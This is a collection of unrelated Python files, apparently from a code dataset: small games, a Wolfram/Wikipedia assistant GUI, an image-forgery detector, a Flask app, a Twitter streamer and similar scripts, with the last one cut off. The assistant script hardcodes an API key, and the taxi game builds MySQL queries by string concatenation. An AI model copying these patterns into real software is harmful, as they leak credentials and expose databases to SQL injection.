class Game(object):
"""Game."""
def __init__(self):
"""Game Constructor."""
self.r = Rooms()
def start(self):
"""Start."""
print("You are in a dark room.")
print("THere is a door to your right and left.")
print("Which one do you take?")
choice = input("> ")
if choice == "left":
self.r.bear_room()
elif choice == "right":
if not self.r.cthulhu_room():
self.start()
else:
self.r.dead("You stumble around the room until you starve.")
|
21,526 | 963dd085935df9513bc45a2d17d023428f90e6f4 | import wolframalpha
import wikipedia
import PySimpleGUI as sg
import random
username = "Miles" # You can change this to display your own name.
client = wolframalpha.Client("Q5W5Y7-UHHJXPLXGA")
def get_greeting():
greetings = ["Hello", "Hey", "Hi", "Greetings", "Salutations"]
return random.choice(greetings)
def get_exception():
exceptions = ["Sorry", "Apologies", "Forgive me"]
return random.choice(exceptions)
sg.theme("Black")
layout = [
[sg.Text(get_greeting() + ", " + username + "! What can I help you with?")],
[sg.Input()],
[sg.Button("Ask")],
[sg.Button("Exit")]
]
window = sg.Window("DANTE", layout)
def search_wolfram(name, values):
try:
wolfram_query = client.query(values[0])
wolfram_result = next(wolfram_query.results).text
return wolfram_result
except:
return f"Nothing found! {get_exception()}, {name}."
def search_wikipedia(name, values):
try:
wikipedia_result = wikipedia.summary(values[0], sentences=2)
return wikipedia_result
except:
return f"Nothing found! {get_exception()}, {name}."
def run_dante():
while True:
event, values = window.read()
if event in (None, "Exit"):
break
wolfram_result = search_wolfram(username, values)
wikipedia_result = search_wikipedia(username, values)
print(wolfram_result, wikipedia_result)
sg.Popup("Wolfram Alpha Result: " + wolfram_result,
"Wikipedia Result: " + wikipedia_result)
window.close()
run_dante()
|
21,527 | cdab2b196991ed87894617c5eaf8714953c67b9e | #!/usr/bin/python
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "strava2mysql.settings")
from strava import models
if __name__ == "__main__":
athlete = models.Athlete()
athlete.firstname = "Fish"
athlete.lastname = "Sticks"
athlete.save()
print athlete
|
21,528 | 64335e1927e18ace1a60abef04b568f60b3df23b | from flask import Flask, flash, redirect, render_template, request, session, abort
import requests, json
app = Flask(__name__)
@app.route("/")
def GetCats():
GetMeCats = requests.get("https://api.thecatapi.com/v1/images/search")
CatsJson = GetMeCats.json()
CatImage = CatsJson[0]["url"]
return render_template('cats.html',cat_pic=CatImage)
if __name__ == "__main__":
#TODO: Use environment variables for this!
app.run(host='0.0.0.0', port=5000) |
21,529 | f57b7e7813095e8ed4ce9cac7c453044a32fad42 | # Ad-hoc algorithm for copy-move forgery detection in images.
# Implemented by - vasiliauskas.agnius@gmail.com
# Robust match algorithm steps:
# 1. Blur image for eliminating image details
# 2. Convert image to degraded palette
# 3. Decompose image into small NxN pixel blocks
# 4. Alphabetically order these blocks by their pixel values
# 5. Extract only these adjacent blocks which have small absolute color difference
# 6. Cluster these blocks into clusters by intersection area among blocks
# 7. Extract only these clusters which are bigger than block size
# 8. Extract only these clusters which have similar cluster, by using some sort of similarity function (in this case Hausdorff distance between clusters)
# 9. Draw discovered similar clusters on image
import sys
from PIL import Image, ImageFilter, ImageDraw
import operator as op
from optparse import OptionParser
def Dist(p1,p2):
"""
Euclidean distance between 2 points
"""
x1, y1 = p1
x2, y2 = p2
return (((x1-x2)*(x1-x2)) + ((y1-y2)*(y1-y2)))**0.5
def intersectarea(p1,p2,size):
"""
Given 2 boxes, this function returns intersection area
"""
x1, y1 = p1
x2, y2 = p2
ix1, iy1 = max(x1,x2), max(y1,y2)
ix2, iy2 = min(x1+size,x2+size), min(y1+size,y2+size)
iarea = abs(ix2-ix1)*abs(iy2-iy1)
if iy2 < iy1 or ix2 < ix1: iarea = 0
return iarea
def Hausdorff_distance(clust1, clust2, forward, dir):
"""
Function measures distance between 2 sets. (Some kind of non-similarity between 2 sets if you like).
It is modified Hausdorff distance, because instead of max distance - average distance is taken.
This is done for function being more error-prone to cluster coordinates.
"""
if forward == None:
return max(Hausdorff_distance(clust1,clust2,True,dir),Hausdorff_distance(clust1,clust2,False,dir))
else:
clstart, clend = (clust1,clust2) if forward else (clust2,clust1)
dx, dy = dir if forward else (-dir[0],-dir[1])
return sum([min([Dist((p1[0]+dx,p1[1]+dy),p2) for p2 in clend]) for p1 in clstart])/len(clstart)
def hassimilarcluster(ind, clusters):
"""
For given cluster tells does it have twin cluster in image or not.
"""
item = op.itemgetter
global opt
found = False
tx = min(clusters[ind],key=item(0))[0]
ty = min(clusters[ind],key=item(1))[1]
for i, cl in enumerate(clusters):
if i != ind:
cx = min(cl,key=item(0))[0]
cy = min(cl,key=item(1))[1]
dx, dy = cx - tx, cy - ty
specdist = Hausdorff_distance(clusters[ind],cl,None,(dx,dy))
if specdist <= int(opt.rgsim):
found = True
break
return found
def blockpoints(pix, coords, size):
"""
Generator of pixel colors of given block.
"""
xs, ys = coords
for x in range(xs,xs+size):
for y in range(ys,ys+size):
yield pix[x,y]
def colortopalette(color, palette):
"""
Convert given color into palette color.
"""
for a,b in palette:
if color >= a and color < b:
return b
def imagetopalette(image, palcolors):
"""
Convert given image into custom palette colors
"""
assert image.mode == 'L', "Only grayscale images supported !"
pal = [(palcolors[i],palcolors[i+1]) for i in range(len(palcolors)-1)]
image.putdata([colortopalette(c,pal) for c in list(image.getdata())])
def getparts(image, block_len):
"""
Decompose given image into small blocks of data.
"""
img = image.convert('L') if image.mode != 'L' else image
w, h = img.size
parts = []
# Bluring image for abandoning image details and noise.
global opt
for n in range(int(opt.imblev)):
img = img.filter(ImageFilter.SMOOTH_MORE)
# Converting image to custom palette
imagetopalette(img, [x for x in range(256) if x%int(opt.impalred) == 0])
pix = img.load()
for x in range(w-block_len):
for y in range(h-block_len):
data = list(blockpoints(pix, (x,y), block_len)) + [(x,y)]
parts.append(data)
parts = sorted(parts)
return parts
def similarparts(imagparts):
"""
Return only these blocks which are similar by content.
"""
dupl = []
global opt
l = len(imagparts[0])-1
for i in range(len(imagparts)-1):
difs = sum(abs(x-y) for x,y in zip(imagparts[i][:l],imagparts[i+1][:l]))
mean = float(sum(imagparts[i][:l])) / l
dev = float(sum(abs(mean-val) for val in imagparts[i][:l])) / l
if dev/mean >= float(opt.blcoldev):
if difs <= int(opt.blsim):
if imagparts[i] not in dupl:
dupl.append(imagparts[i])
if imagparts[i+1] not in dupl:
dupl.append(imagparts[i+1])
return dupl
def clusterparts(parts, block_len):
"""
Further filtering out non essential blocks.
This is done by clustering blocks at first and after that
filtering out small clusters and clusters which doesn`t have
twin cluster in image.
"""
parts = sorted(parts, key=op.itemgetter(-1))
global opt
clusters = [[parts[0][-1]]]
# assign all parts to clusters
for i in range(1,len(parts)):
x, y = parts[i][-1]
# detect box already in cluster
fc = []
for k,cl in enumerate(clusters):
for xc,yc in cl:
ar = intersectarea((xc,yc),(x,y),block_len)
intrat = float(ar)/(block_len*block_len)
if intrat > float(opt.blint):
if not fc: clusters[k].append((x,y))
fc.append(k)
break
# if this is new cluster
if not fc:
clusters.append([(x,y)])
else:
# re-clustering boxes if in several clusters at once
while len(fc) > 1:
clusters[fc[0]] += clusters[fc[-1]]
del clusters[fc[-1]]
del fc[-1]
item = op.itemgetter
# filter out small clusters
clusters = [clust for clust in clusters if Dist((min(clust,key=item(0))[0],min(clust,key=item(1))[1]), (max(clust,key=item(0))[0],max(clust,key=item(1))[1]))/(block_len*1.4) >= float(opt.rgsize)]
# filter out clusters, which doesn`t have identical twin cluster
clusters = [clust for x,clust in enumerate(clusters) if hassimilarcluster(x,clusters)]
return clusters
def marksimilar(image, clust, size):
"""
Draw discovered similar image regions.
"""
global opt
blocks = []
if clust:
draw = ImageDraw.Draw(image)
mask = Image.new('RGB', (size,size), 'cyan')
for cl in clust:
for x,y in cl:
im = image.crop((x,y,x+size,y+size))
im = Image.blend(im,mask,0.5)
blocks.append((x,y,im))
for bl in blocks:
x,y,im = bl
image.paste(im,(x,y,x+size,y+size))
if int(opt.imauto):
for cl in clust:
cx1 = min([cx for cx,cy in cl])
cy1 = min([cy for cx,cy in cl])
cx2 = max([cx for cx,cy in cl]) + block_len
cy2 = max([cy for cx,cy in cl]) + block_len
draw.rectangle([cx1,cy1,cx2,cy2],outline="magenta")
return image
if __name__ == '__main__':
cmd = OptionParser("usage: %prog image_file [options]")
cmd.add_option('', '--imauto', help='Automatically search identical regions. (default: %default)', default=1)
cmd.add_option('', '--imblev',help='Blur level for degrading image details. (default: %default)', default=8)
cmd.add_option('', '--impalred',help='Image palette reduction factor. (default: %default)', default=15)
cmd.add_option('', '--rgsim', help='Region similarity threshold. (default: %default)', default=5)
cmd.add_option('', '--rgsize',help='Region size threshold. (default: %default)', default=1.5)
cmd.add_option('', '--blsim', help='Block similarity threshold. (default: %default)',default=200)
cmd.add_option('', '--blcoldev', help='Block color deviation threshold. (default: %default)', default=0.2)
cmd.add_option('', '--blint', help='Block intersection threshold. (default: %default)', default=0.2)
opt, args = cmd.parse_args()
if not args:
cmd.print_help()
sys.exit()
print('Analyzing image, please wait... (can take some minutes)')
block_len = 15
im = Image.open(args[0])
lparts = getparts(im, block_len)
dparts = similarparts(lparts)
cparts = clusterparts(dparts, block_len) if int(opt.imauto) else [[elem[-1] for elem in dparts]]
im = marksimilar(im, cparts, block_len)
out = args[0].split('.')[0] + '_analyzed.jpg'
im.save(out)
print('Done. Found', len(cparts) if int(opt.imauto) else 0, 'identical regions')
print('Output is saved in file -', out)
|
21,530 | 809e30652c05a8fd4d53bee355313cf7ae329213 | #-*- coding:utf-8 -*-
import pygame
from pygame.locals import *
import sys
import os
import random
import importlib
# データベース初期設定
import mysql.connector
conn = mysql.connector.connect(user='root', password='', host='localhost', database='taxi')
cur=conn.cursor()
txtrank = []
runrank = []
def updatesql():
global cur, conn, problemstr, mapsttr, txtrank, runrank
cur.execute("SELECT name, txt FROM ranking WHERE map = \"" + mapstr + "\" AND problem = \"" + problemstr + "\" ORDER BY txt LIMIT 5")
txtrank = cur.fetchall()
cur.execute("SELECT name, run FROM ranking WHERE map = \"" + mapstr + "\" AND problem = \"" + problemstr + "\" ORDER BY run LIMIT 5")
runrank = cur.fetchall()
# ゲームの状態遷移
G_TITLE = 0
G_SELECT_MAP = 1
G_SELECT_PROBLEM = 2
G_GAME = 3
G_TEST = 4
G_NAME = 5
G_RANKING = 6
G_FIRED = 7
mode = 0
w=1280
h=720
SCREEN_SIZE = (w, h)
pygame.init()
#ゲーム終了
def gameend():
pygame.quit()
cur.close
conn.close
sys.exit()
# 引数の2番目をFULLSCREENにするとフルスクリーンになります
screen = pygame.display.set_mode(SCREEN_SIZE, 0, 32)
pygame.display.set_caption("Taxi")
#フォント設定
font50 = pygame.font.Font(None, 50)
font80 = pygame.font.Font(None, 80)
font100 = pygame.font.Font(None, 100)
font160 = pygame.font.Font(None, 160)
#その他インポート
from driver import *
import writer
#mapselectで用いるリスト設定
maplist = os.listdir("map")
mapstr = ""
for i in reversed(range(len(maplist))):
if maplist[i][:2] == "__":
del maplist[i]
else:
maplist[i] = maplist[i][:-3]
maplist.append("back")
maps = None
mapselector = 0
setupMapfunction = None
#mapのインポート
def mapset():
global maplist, mapselector, maps, setupMapfunction, car, the_map, loclist, road, w, h
maps = importlib.import_module("map." + maplist[mapselector])
mapstr = maplist[mapselector]
setupMapfunction = maps.set
car, the_map, loclist, road = setupMapfunction(w, h)
#mapモジュールの削除
def mapdelete():
global mapstr, maps, mapselector, setupMapfunction
if "map." + mapstr in sys.modules:
sys.modules.pop("map." + mapstr)
mapstr = ""
maps = None
setupMapfunction = None
mapselector = 0
#problemselectで用いるリスト設定
problemlist = os.listdir("problem")
problemstr = ""
for i in reversed(range(len(problemlist))):
if problemlist[i][:2] == "__":
del problemlist[i]
else:
problemlist[i] = problemlist[i][:-3]
problemlist.append("back")
problems = None
problemselector = 0
#problemのインポート
def problemset():
global problemstr, problemlist, problemselector, problems, car, loclist, the_map, road, w, h
problemstr = problemlist[problemselector]
problems = importlib.import_module("problem." + problemstr)
problems.set_problem(loclist)
setup(car, loclist, the_map, road, h, w, False)
#problemモジュールの削除
def problemdelete():
global problemstr, problems, problemselector
if "problem." + problemstr in sys.modules:
sys.modules.pop("problem." + problemstr)
problemselector = 0
problems = None
#画像、テキストエディタ、クロック
titlelogo = pygame.image.load("img/logo.png")
fired = pygame.image.load("img/gameover.png")
textinput = writer.TextInput()
clock = pygame.time.Clock()
while True:
#タイトル画面
if mode == G_TITLE:
#ロゴ、背景表示
screen.fill((255, 255, 255))
screen.blit(titlelogo, [(w - titlelogo.get_width()) / 2.0, (h - titlelogo.get_height()) / 2.0])
#スタート文字の表示(mouseonで変更)
x, y = pygame.mouse.get_pos()
text = font80.render("start", True, (255, 255, 255))
if (w - text.get_width()) / 2 - 20 < x < (w + text.get_width()) / 2 + 20 and h * 3 / 4 - 10 < y < h * 3 / 4 + text.get_height() + 10:
text = font80.render("start", True, (0, 0, 0))
pygame.draw.rect(screen, (255, 255, 255), Rect((w - text.get_width()) / 2 - 20, h * 3 / 4 - 10, text.get_width() + 40, text.get_height() + 20))
else:
pygame.draw.rect(screen, (0, 0, 0), Rect((w - text.get_width()) / 2 - 20, h * 3 / 4 - 10, text.get_width() + 40, text.get_height() + 20))
screen.blit(text, [(w - text.get_width()) / 2, h * 3 / 4])
#イベント処理
for event in pygame.event.get():
if event.type == QUIT:
gameend()
#クリック処理
elif event.type == MOUSEBUTTONDOWN and event.button == 1:
x, y = event.pos
if (w - text.get_width()) / 2 - 20 < x < (w + text.get_width()) / 2 + 20 and h * 3 / 4 - 10 < y < h * 3 / 4 + text.get_height() + 10:
mapdelete()
mode = G_SELECT_MAP
#キー処理
elif event.type == KEYDOWN:
if event.key == K_RETURN:
mapdelete()
mode = G_SELECT_MAP
elif event.key == K_ESCAPE:
gameend()
#マップ設定画面
elif mode == G_SELECT_MAP:
#画面表示
screen.fill((255, 255, 255))
text = font160.render("MAP SELECT", True, (0, 0, 0))
screen.blit(text, [(w - text.get_width()) / 2, 0])
x, y = pygame.mouse.get_pos()
#map選択欄は1つあたり160x80位。mouseonで変更
for i in range(len(maplist)):
if w / 2 - 80 < x < w / 2 + 80 and h / 2 - 50 - (len(maplist) / 2 - i) * 100 < y < h / 2 + 30 - (len(maplist) / 2 - i) * 100:
mapselector = i
break
for i in range(len(maplist)):
if i == mapselector:
pygame.draw.rect(screen, (0, 0, 0), Rect(w / 2 - 80, h / 2 - 50 - (len(maplist) / 2 - i) * 100, 160, 80))
text = font80.render(maplist[i], True, (255, 255, 255))
else:
pygame.draw.rect(screen, (255, 255, 255), Rect(w / 2 - 80, h / 2 - 50 - (len(maplist) / 2 - i ) * 100, 160, 80))
text = font80.render(maplist[i], True, (0, 0, 0))
screen.blit(text, [(w - text.get_width()) / 2, (h - 80) / 2 - (len(maplist) / 2 - i ) * 100])
#イベント処理
for event in pygame.event.get():
if event.type == QUIT:
gameend()
#クリック処理
elif event.type == MOUSEBUTTONDOWN and event.button == 1:
x, y = event.pos
for i in range(len(maplist)):
if w / 2 - 80 < x < w / 2 + 80 and h / 2 - 50 - (len(maplist) / 2 - i) * 100 < y < h / 2 + 30 - (len(maplist) / 2 - i) * 100:
if maplist[i] == "back":
mapselector = 0
mode = G_TITLE
else:
mapset()
problemdelete()
mode = G_SELECT_PROBLEM
#キー処理
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
gameend()
#セレクタ
elif event.key == K_DOWN:
mapselector = min(mapselector + 1, len(maplist) - 1)
elif event.key == K_UP:
mapselector = max(mapselector - 1, 0)
elif event.key == K_RETURN:
if maplist[mapselector] == "back":
mapselector = 0
mode = G_TITLE
else:
mapset()
mode = G_SELECT_PROBLEM
#問題設定画面
elif mode == G_SELECT_PROBLEM:
#画面表示
screen.fill((255, 255, 255))
text = font160.render("PROBLEM SELECT", True, (0, 0, 0))
screen.blit(text, [(w - text.get_width()) / 2, 0])
x, y = pygame.mouse.get_pos()
#problem選択欄は1つあたり320x80位。
for i in range(len(problemlist)):
if w / 2 - 80 < x < w / 2 + 80 and h / 2 - (len(problemlist) / 2 - i) * 100 < y < h / 2 + 180 - (len(problemlist) / 2 - i) * 100:
problemselector = i
break
for i in range(len(problemlist)):
if i == problemselector:
text = font80.render(problemlist[i], True, (255, 255, 255))
pygame.draw.rect(screen, (0, 0, 0), Rect(w / 2 - 160, h / 2 + 110 - (len(problemlist) / 2 - i) * 100, 320, 80))
else:
text = font80.render(problemlist[i], True, (0, 0, 0))
pygame.draw.rect(screen, (255, 255, 255), Rect(w / 2 - 160, h / 2 + 110 - (len(maplist) / 2 - i) * 100, 320, 80))
screen.blit(text, [(w - text.get_width()) / 2, h / 2 + 110 - (len(problemlist) / 2 - i) * 100])
#イベント処理
for event in pygame.event.get():
if event.type == QUIT:
gameend()
#クリック処理
elif event.type == MOUSEBUTTONDOWN and event.button == 1:
x,y = event.pos
for i in range(len(problemlist)):
if w / 2 - 80 < x < w / 2 + 80 and h / 2 - (len(problemlist) / 2 - i) * 100 < y < h / 2 + 180 - (len(problemlist) / 2 - i) * 100:
if problemlist[i] == "back":
mapdelete()
mode = G_SELECT_MAP
else:
problemset()
mode = G_GAME
#キー処理
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
gameend()
#セレクタ
elif event.key == K_DOWN:
problemselector = min(problemselector + 1, len(problemlist) - 1)
elif event.key == K_UP:
problemselector = max(problemselector - 1, 0)
elif event.key == K_RETURN:
if problemlist[problemselector] == "back":
mapdelete()
mode = G_SELECT_MAP
else:
problemset()
mode = G_GAME
# ゲーム中(基本的に画面含めdriverに投げます)
elif mode == G_GAME:
screen.fill((255, 255, 255))
finished, ans = gaming(screen)
text = font.render("Answer: " + problems.check + ", Your Output: " + ans, True, (0, 0, 0))
screen.blit(text, [450, h - 80])
#答え確認
if finished:
if ans == problems.check:
car, the_map, loclist, road = setupMapfunction(w, h)
problems.set_test(loclist, 0)
setup(car, loclist, the_map, road, h, w, True)
mode = G_TEST
else:
mode = G_FIRED
# テスト中(基本的に画面含めdriverに投げます)
elif mode == G_TEST:
screen.fill((255, 255, 255))
text = font.render("Testing...({0}/{1})".format(problems.testphase, len(problems.check_test)), True, (0,0,0))
screen.blit(text, [(w-text.get_width())/2,20])
finished, result = testing(screen)
text = font.render("Answer: " + problems.check_test[problems.testphase] + ", Your Output: " + result, True, (0, 0, 0))
screen.blit(text, [450, h - 80])
if finished:
#答え確認、残りの問題が無くなったら終了
if result == problems.check_test[problems.testphase]:
problems.testphase+=1
if problems.testphase == len(problems.check_test):
mode = G_NAME
textinput = writer.TextInput()
updatesql()
else:
car, the_map, loclist, road = setupMapfunction(w, h)
problems.set_test(loclist, problems.testphase)
setup(car, loclist, the_map, road, h, w, True)
else:
mode = G_FIRED
#クリア画面。名前の受け取りを行います
elif mode == G_NAME:
#枠
pygame.draw.rect(screen, (255, 255, 200), Rect(30, 10, 1220, 700))
#スコア
txt,run=get_score()
text = font100.render("Score: {:d}bytes / {:.3f}miles".format(txt,run), True, (0, 0, 0))
screen.blit(text, [(w-text.get_width())//2,10])
#ランキング表の表示
text = font80.render("code", True, (0, 0, 0))
screen.blit(text,[320-text.get_width()/2,150])
text = font80.render("distance", True, (0, 0, 0))
screen.blit(text,[960-text.get_width()/2,150])
#左は(70-620)x(200-550)
for i in range(len(txtrank)):
rankstr = font50.render(countingStr(i+1), True, (0, 0, 0))
username = font50.render(str(txtrank[i][0]), True, (0, 0, 0))
txtscore = font50.render(str(txtrank[i][1]), True, (0, 0, 0))
screen.blit(rankstr, [80, 210+70*i])
screen.blit(username, [210,210+70*i])
screen.blit(txtscore, [500,210+70*i])
pygame.draw.rect(screen, (0,0,0), Rect(70,200+70*i,550,70),10)
pygame.draw.line(screen, (0,0,0), (190,200+70*i), (190,270+70*i), 10)
pygame.draw.line(screen, (0,0,0), (480,200+70*i), (480,270+70*i), 10)
#右は(660-1210)x(200-550)
for i in range(len(runrank)):
rankstr = font50.render(countingStr(i+1), True, (0, 0, 0))
username = font50.render(str(runrank[i][0]), True, (0, 0, 0))
runscore = font50.render(str(runrank[i][1]), True, (0, 0, 0))
screen.blit(rankstr, [670, 210+70*i])
screen.blit(username, [800, 210 + 70 * i])
screen.blit(runscore, [1090, 210 + 70 * i])
pygame.draw.rect(screen, (0, 0, 0), Rect(660, 200 + 70 * i, 550, 70), 10)
pygame.draw.line(screen, (0, 0, 0), (790, 200 + 70 * i), (790, 270 + 70 * i), 10)
pygame.draw.line(screen, (0, 0, 0), (1070, 200 + 70 * i), (1070, 270 + 70 * i), 10)
#イベント処理
events = pygame.event.get()
for event in events:
if event.type == QUIT:
gameend()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
gameend()
#ランキング登録
elif event.key == K_RETURN:
username = textinput.get_text()
#一応のSQL対策
ok = len(username) < 64
for i in username:
if not i in "abcdefghijklmnopqretuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_!?.,(){}[]@":
ok = False
if ok:
#名前があるならそれぞれ最小値で更新、そうでないなら普通にinsertし、ランキング表示画面へ移行
cur.execute("SELECT run,txt FROM ranking WHERE name = \"" + username + "\" AND map = \"" + mapstr + "\" AND problem = \"" + problemstr + "\"")
result = cur.fetchall()
if len(result) == 0:
cur.execute("INSERT INTO ranking VALUE(\""+username+"\", {:.3f}, {:d}, \"".format(run, txt) + mapstr + "\", \"" + problemstr + "\")")
else:
run = min(run, result[0][0])
txt = min(txt, result[0][1])
cur.execute("UPDATE ranking SET run = {:.3f}, txt = {:d} WHERE name = \"".format(run, txt) + username + "\"")
conn.commit()
updatesql()
mode = G_RANKING
#ユーザーネーム入力欄
text = font50.render("Register with the ranking!! Your Name:", True, (0, 0, 0))
screen.blit(text, (50, 600))
textinput.update(events)
screen.blit(textinput.get_surface(), (700, 600))
#ランキング表示
elif mode == G_RANKING:
#枠
pygame.draw.rect(screen, (255, 255, 200), Rect(30, 10, 1220, 700))
#あなたの記録
txt, run = get_score()
text = font100.render("Score: {:d}bytes / {:.3f}miles".format(txt, run), True, (0, 0, 0))
screen.blit(text, [(w - text.get_width()) // 2, 10])
#ランキング表示
text = font80.render("code", True, (0, 0, 0))
screen.blit(text, [320 - text.get_width() / 2, 150])
text = font80.render("distance", True, (0, 0, 0))
screen.blit(text, [960 - text.get_width() / 2, 150])
#左は(70-620)x(200-550)
for i in range(len(txtrank)):
rankstr = font50.render(countingStr(i + 1), True, (0, 0, 0))
username = font50.render(str(txtrank[i][0]), True, (0, 0, 0))
txtscore = font50.render(str(txtrank[i][1]), True, (0, 0, 0))
screen.blit(rankstr, [80, 210 + 70 * i])
screen.blit(username, [210, 210 + 70 * i])
screen.blit(txtscore, [500, 210 + 70 * i])
pygame.draw.rect(screen, (0, 0, 0), Rect(70, 200 + 70 * i, 550, 70), 10)
pygame.draw.line(screen, (0, 0, 0), (190, 200 + 70 * i), (190, 270 + 70 * i), 10)
pygame.draw.line(screen, (0, 0, 0), (480, 200 + 70 * i), (480, 270 + 70 * i), 10)
#右は(660-1210)x(120-550)
for i in range(len(runrank)):
rankstr = font50.render(countingStr(i + 1), True, (0, 0, 0))
username = font50.render(str(runrank[i][0]), True, (0, 0, 0))
runscore = font50.render(str(runrank[i][1]), True, (0, 0, 0))
screen.blit(rankstr, [670, 210 + 70 * i])
screen.blit(username, [800, 210 + 70 * i])
screen.blit(runscore, [1090, 210 + 70 * i])
pygame.draw.rect(screen, (0, 0, 0), Rect(660, 200 + 70 * i, 550, 70), 10)
pygame.draw.line(screen, (0, 0, 0), (790, 200 + 70 * i), (790, 270 + 70 * i), 10)
pygame.draw.line(screen, (0, 0, 0), (1070, 200 + 70 * i), (1070, 270 + 70 * i), 10)
#イベント処理
for event in pygame.event.get():
if event.type == QUIT:
gameend()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
gameend()
elif event.key == K_RETURN:
mapdelete()
mode = G_SELECT_MAP
#ゲームオーバー画面
elif mode == G_FIRED:
screen.blit(fired, [(w - fired.get_width()) / 2, (h - fired.get_height()) / 2])
for event in pygame.event.get():
if event.type == QUIT:
gameend()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
gameend()
if event.key == K_RETURN:
mode = G_TITLE
pygame.display.update()
clock.tick(30)
|
21,531 | 29b374e3bfd85b36f5f7f4a937d0c9eb6265721b | __author__ = 'Thomas Li Fredriksen'
__license__ = 'MIT'
from .pyswitch import PySwitch, SwitchCase
|
21,532 | b5239d7f746dbf4c982e5708f723213286b5d211 | import json
from typing import List
from DDBMS.Parser.SQLQuery.Column import Column
from DDBMS.Parser.SQLQuery.Table import Table
from abc import ABC, abstractmethod
#TODO add a function to return the output dict as dict (for pretty printing later)
class Node(ABC):
def __init__(self, *, children = []) -> None:
super().__init__()
self.parent = None
self.children = []
for child in children:
self.addChild(child)
def addChild(self, child) -> None:
child.parent = self
self.children.append(child)
@abstractmethod
def __repr__(self) -> str:
output = {
'Node': {
'children': str(self.children)
}
}
return str(output)
class SelectNode(Node):
def __init__(self, *, predicate, children = []) -> None:
super().__init__(children=children)
self.predicate = predicate
def __repr__(self) -> str:
output = {
'Select':{
'predicate': str(self.predicate),
'children': str(self.children)
}
}
return str(output)
class ProjectNode(Node):
def __init__(self, *, columns : List[Column], children=[]) -> None:
super().__init__(children=children)
self.columns = columns
def __repr__(self) -> str:
output = {
'Project':{
'columns': str(self.columns),
'children': str(self.children)
}
}
return str(output)
class GroupbyNode(Node):
def __init__(self, *, group_by_columns : List[Column], children = []) -> None:
super().__init__(children=children)
self.group_by_columns = group_by_columns
def __repr__(self) -> str:
output = {
'Groupby':{
'group_by_columns': str(self.group_by_columns),
'children': str(self.children)
}
}
return str(output)
class UnionNode(Node):
def __init__(self, *, children = []) -> None:
super().__init__(children=children)
def __repr__(self) -> str:
output = {
'Union':{
'children': str(self.children)
}
}
return str(output)
class JoinNode(Node):
def __init__(self, join_predicate, children = []) -> None:
super().__init__(children=children)
self.join_predicate = join_predicate
def __repr__(self) -> str:
output = {
'Union':{
'join_predicate': str(self.join_predicate),
'children': str(self.children)
}
}
return str(output)
class CrossNode(Node):
def __init__(self, *, children = []) -> None:
super().__init__(children=children)
def __repr__(self) -> str:
output = {
'Cross':{
'children': str(self.children)
}
}
return str(output)
class RelationNode(Node):
def __init__(self, table : Table) -> None:
super().__init__(children=[])
self.table = table
def __repr__(self) -> str:
output = {
'Relation':{
'table': str(self.table),
'children': str(self.children)
}
}
return str(output)
def __eq__(self, o: object) -> bool:
if isinstance(o, Table):
return self.table == o
return super().__eq__(o)
|
21,533 | f4df9703657cda305a933801117558d2d75813a0 | import os
import cv2
import shutil
# count = 0
# for dir_ in os.listdir("google_images/"):
# for img_name in os.listdir("google_images/"+dir_+"/"):
# source = "google_images/"+dir_+"/"+img_name
# try:
# img = cv2.imread(source, 0)
# img = cv2.resize(img, (250, 250))
# cv2.imwrite(f"neg/neg_{count}.png", img)
# count += 1
# except Exception as e:
# print(e)
# print(source, end="\n\n")
# print(count)
# count = 0
# for img_name in os.listdir("fer_/"):
# try:
# img = cv2.imread("fer_/"+img_name, 0)
# img = cv2.resize(img, (96,96))
# cv2.imwrite(f"fer/fer_{count}.png", img)
# count += 1
# except Exception as e:
# print(e)
# print(img_name)
# print(count)
count = 0
img_size = set()
for image_name in os.listdir("pos/"):
try:
img = cv2.imread("pos/"+image_name, 0)
img_size.add(img.shape)
count += 1
except Exception:
print(image_name)
print(img_size, count)
# import os
# from PIL import Image
# count = 0
# for infile in os.listdir("jaffe/"):
# print("file : ", infile)
# if infile[-4:] == "tiff":
# outfile = f"jaffe_/jap_{count}.png"
# im = Image.open("jaffe/" + infile)
# print("new filename : ",outfile)
# out = im.convert("RGB")
# out.save(outfile, "png", quality=90)
# count += 1
# else:
# print("in else")
# count = 0
# for image_name in os.listdir("jaffe_/"):
# img = cv2.imread("jaffe_/"+image_name, 0)
# w, h = img.shape
# img = img[int(w*0.2): int(w*0.9), int(h*0.25): int(h*0.75)]
# cv2.imwrite(f"jaffe/jap_{count}.png", img)
# count += 1
# print(count)
# count = 0
# for dir_ in os.listdir("datasets/"):
# for img in os.listdir("datasets/"+dir_+"/"):
# source = "datasets/" + dir_ + "/" + img
# dest = "pos/"
# shutil.copy(source, dest)
# count += 1
# print(count) |
21,534 | 1415ccd175ad67d3fe57298de686753dbf6ec224 | """
@authors: YOU
"""
import MongoManager
import TwitterManager
import Constants
import Variables
import pymongo
if __name__ == '__main__':
if(not Variables.Database.EXISTING_RESEARCH):
# Connect to the default host and port. Can be specified : MongoClient('localhost', 27017)
client = pymongo.MongoClient()
# Create the default document structure in which the tweets will be uploaded
doc = MongoManager.createDefaultDoc(Variables.Database.RESEARCH_PYTHON_ID, Variables.Database.RESEARCH_USER_ID, Variables.Database.RESEARCH_TITLE, Variables.Database.RESEARCH_DESC, Variables.Database.DURATION, Variables.Database.WORDS)
# Create a new research collection (and the database if it's the first time) and insert the doc into it
MongoManager.createNewResearchColl(doc, Variables.Database.COLL_NAME, Variables.Database.DB_NAME, client)
# Disconnect this client because we're using an other one in on_success
client.disconnect()
# Create the stream with the different Twitter keys/access tokens
streamer = TwitterManager.TweetStreamer(Constants.Connexion.CONSUMER_KEY, Constants.Connexion.CONSUMER_SECRET, Constants.Connexion.ACCESS_TOKEN_KEY, Constants.Connexion.ACCESS_TOKEN_SECRET)
# Add a filter to the stream, about the track to keep (words) and the language
streamer.statuses.filter(track = Variables.Database.TRACK, language = Constants.Stream.LANG)
|
21,535 | 16a74b53248362a24097d6e36f421e99dfc72b80 | #Задача 5.
#Відсортувати кожен рядок двовимірного масиву у порядку зростання.
n = int(input("Enter number rows :"))
m = int(input("Enter number cloums :"))
num_lst = []
i=0
for i in range(n):
num_lst.append([int(j) for j in input("Введите числа через пробел ").split()])
print(len(num_lst[i]))
if len(num_lst[i])!=m:
print("Количество столбиков вышло за предел")
for i in num_lst:
